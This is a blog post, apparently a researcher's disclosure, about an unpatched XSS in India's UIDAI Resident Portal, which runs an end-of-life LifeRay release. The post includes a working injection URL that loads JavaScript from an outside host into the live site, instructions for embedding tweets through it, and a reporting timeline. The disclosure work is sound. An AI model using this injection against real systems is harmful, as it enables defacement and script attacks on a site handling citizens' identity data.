Vulnerability reported in resident.uidai.gov.in allows anyone to change content on the UIDAI website. The UIDAI Resident Portal has direct access to Aadhaar demographic data. The vulnerability (XSS) allows anyone to embed any tweet on the UIDAI website

The Vulnerability

The UIDAI Resident Portal (with read access to entire Aadhaar Demographic data) is runing a vulnerable version of LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in Febrary 2016.

This release includes multiple known vulnerabilities, including:

  1. A XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)
  2. Multiple RCEs: See issue-62 for eg.

In fact the release is so old it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to go look at their Archived Vulnerabilities.

The PoC

You can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.

The cdn_host parameter injects javascript from $CDN_HOST/Resident-theme/js/custom.js, in this case https://scan.bb8.fun/Resident-theme/js/custom.js which hosts a small snippet to overwrite the HTML of the page.

It shows up like:

 

Fun

The current script allows for embeding any tweet using a tweet parameter. To embed:

Go to any tweet, copy the part after twitter.com and pass it as the tweetparameter. For eg, to embed this tweet:

Aadhaar Compound Wall@13footwall

Breaking: Exclusive footage from inside @UIDAI‘s IT department after media reports of Aadhaar data leaks.

 

  1. Look at the URL: https://twitter.com/13footwall/status/979301578686345216
  2. Copy 13footwall/status/979301578686345216 and pass it as the tweet parameter:
  3. The URL becomeshttps://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
  4. SHARE IT

The Report

I initially reported this to help@uidai.gov.in in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

This is still not fixed. Here is a complete timeline:

DateWhat?
16 Jan 2017Initially reported to help@uidai.gov.in. No response
21 Jan 2018Reported to ceo@uidai.gov.in and info@cert-in.org.in. No response
19 Feb 2018Reminder sent to ceo@uidai.gov.in and info@cert-in.org.in
19 Feb 2018Acknowledgement from CERT
15 Mar 2018Reminder sent. No response
17 Mar 2018Notified NCIIPC
18 Mar 2018Confirmation from NCIIPC asking for more details. I replied back with a quote of previous exchange
19 Mar 2018Confirmation from NCIIPC thanking me for the report.
19 Apr 2018Reminder sent to UIDAI asking for acknowledgement
30 May 2018Reminder sent to NCIIPC and CERT asking for updates

The only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in a HTTP response Header.

 

Originally published here.


Leave a Reply

Your email address will not be published. Required fields are marked *